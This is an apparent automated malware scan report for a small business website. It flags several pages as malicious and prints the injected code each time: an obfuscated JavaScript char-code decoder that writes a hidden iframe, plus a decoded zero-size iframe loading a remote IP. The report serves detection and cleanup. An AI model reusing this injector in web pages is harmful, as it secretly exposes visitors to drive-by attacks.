Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=inspectionmanager.us
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.inspectionmanager.us/ | 200 OK Content-Length: 45095 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function Decode(){var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!119!111!109!97!110!115!101!120!115!104!97!116!46!98!105!122!47!34!32!115!116!121!108!101!61!34!100!105!115!112!108!97!121!58!110!111!110!101!59!34!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} Decoded script: <iframe width="0" height="0" frameborder="0" scrolling="no" src="http://193.203.50.43/?ftp&se_rrr=undefined&charset=utf-8"></iframe> Antivirus reports:
| ||
http://www.inspectionmanager.us//use.typekit.net/hft7kqp.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Date: Thu, 08 Jan 2015 18:38:13 GMT Pragma: no-cache Location: http://www.inspectionmanager.us/use.typekit.net/hft7kqp.js/ Server: Apache/2.0.52 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 08 Jan 2015 18:38:13 GMT X-Cnection: close X-Pingback: http://www.inspectionmanager.us/xmlrpc.php X-Powered-By: PHP/5.2.17 X-Powered-By: PleskLin | clean |
http://www.inspectionmanager.us/use.typekit.net/hft7kqp.js/ | 404 Not Found Content-Length: 28517 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function Decode(){var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!119!111!109!97!110!115!101!120!115!104!97!116!46!98!105!122!47!34!32!115!116!121!108!101!61!34!100!105!115!112!108!97!121!58!110!111!110!101!59!34!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} Decoded script: <iframe width="0" height="0" frameborder="0" scrolling="no" src="http://193.203.50.43/?ftp&se_rrr=undefined&charset=utf-8"></iframe> Antivirus reports:
| ||
http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js?ver=3.4.1 | 200 OK Content-Length: 93868 Content-Type: text/javascript | clean |
http://www.inspectionmanager.us/wp-content/themes/im/js/picturefill.js | 200 OK Content-Length: 1830 Content-Type: application/x-javascript | clean |
http://www.inspectionmanager.us/wp-content/themes/im/js/jcarousellite.min.js | 200 OK Content-Length: 6603 Content-Type: application/x-javascript | clean |
http://www.inspectionmanager.us/wp-content/themes/im/js/jgestures.min.js | 200 OK Content-Length: 15968 Content-Type: application/x-javascript | clean |
http://www.inspectionmanager.us/wp-content/themes/im/js/jquery.colorbox-min.js | 200 OK Content-Length: 9789 Content-Type: application/x-javascript | clean |
http://www.inspectionmanager.us/wp-content/themes/im/js/jquery.flexslider-min.js | 200 OK Content-Length: 41914 Content-Type: application/x-javascript | clean |
http://www.inspectionmanager.us/wp-content/themes/im/js/api.js | 200 OK Content-Length: 30096 Content-Type: application/x-javascript | clean |
http://www.inspectionmanager.us/video-tour | 200 OK Content-Length: 28992 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function Decode(){var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!119!111!109!97!110!115!101!120!115!104!97!116!46!98!105!122!47!34!32!115!116!121!108!101!61!34!100!105!115!112!108!97!121!58!110!111!110!101!59!34!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} Decoded script: <iframe width="0" height="0" frameborder="0" scrolling="no" src="http://193.203.50.43/?ftp&se_rrr=undefined&charset=utf-8"></iframe> Antivirus reports:
| ||
http://www.inspectionmanager.us/wp-includes/js/comment-reply.js?ver=3.4.1 | 200 OK Content-Length: 786 Content-Type: application/x-javascript | clean |
http://www.inspectionmanager.us/feature | 200 OK Content-Length: 38890 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function Decode(){var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!119!111!109!97!110!115!101!120!115!104!97!116!46!98!105!122!47!34!32!115!116!121!108!101!61!34!100!105!115!112!108!97!121!58!110!111!110!101!59!34!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} Decoded script: <iframe width="0" height="0" frameborder="0" scrolling="no" src="http://193.203.50.43/?ftp&se_rrr=undefined&charset=utf-8"></iframe> Antivirus reports:
| ||
http://www.inspectionmanager.us/pricing | 200 OK Content-Length: 43748 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function Decode(){var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!119!111!109!97!110!115!101!120!115!104!97!116!46!98!105!122!47!34!32!115!116!121!108!101!61!34!100!105!115!112!108!97!121!58!110!111!110!101!59!34!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} Decoded script: <iframe width="0" height="0" frameborder="0" scrolling="no" src="http://193.203.50.43/?ftp&se_rrr=undefined&charset=utf-8"></iframe> Antivirus reports:
| ||
http://www.inspectionmanager.us/download | 200 OK Content-Length: 33508 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function Decode(){var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!119!111!109!97!110!115!101!120!115!104!97!116!46!98!105!122!47!34!32!115!116!121!108!101!61!34!100!105!115!112!108!97!121!58!110!111!110!101!59!34!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} Decoded script: <iframe width="0" height="0" frameborder="0" scrolling="no" src="http://193.203.50.43/?ftp&se_rrr=undefined&charset=utf-8"></iframe> Antivirus reports:
| ||
http://www.inspectionmanager.us/results | 200 OK Content-Length: 36410 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function Decode(){var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!119!111!109!97!110!115!101!120!115!104!97!116!46!98!105!122!47!34!32!115!116!121!108!101!61!34!100!105!115!112!108!97!121!58!110!111!110!101!59!34!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} Decoded script: <iframe width="0" height="0" frameborder="0" scrolling="no" src="http://193.203.50.43/?ftp&se_rrr=undefined&charset=utf-8"></iframe> Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: inspectionmanager.us
Result:
GET / HTTP/1.1
Host: inspectionmanager.us
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: inspectionmanager.us
Referer: http://www.google.com/search?q=inspectionmanager.us
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: inspectionmanager.us
Referer: http://www.google.com/search?q=inspectionmanager.us
Result:
The result is similar to the first query. There are no suspicious redirects found.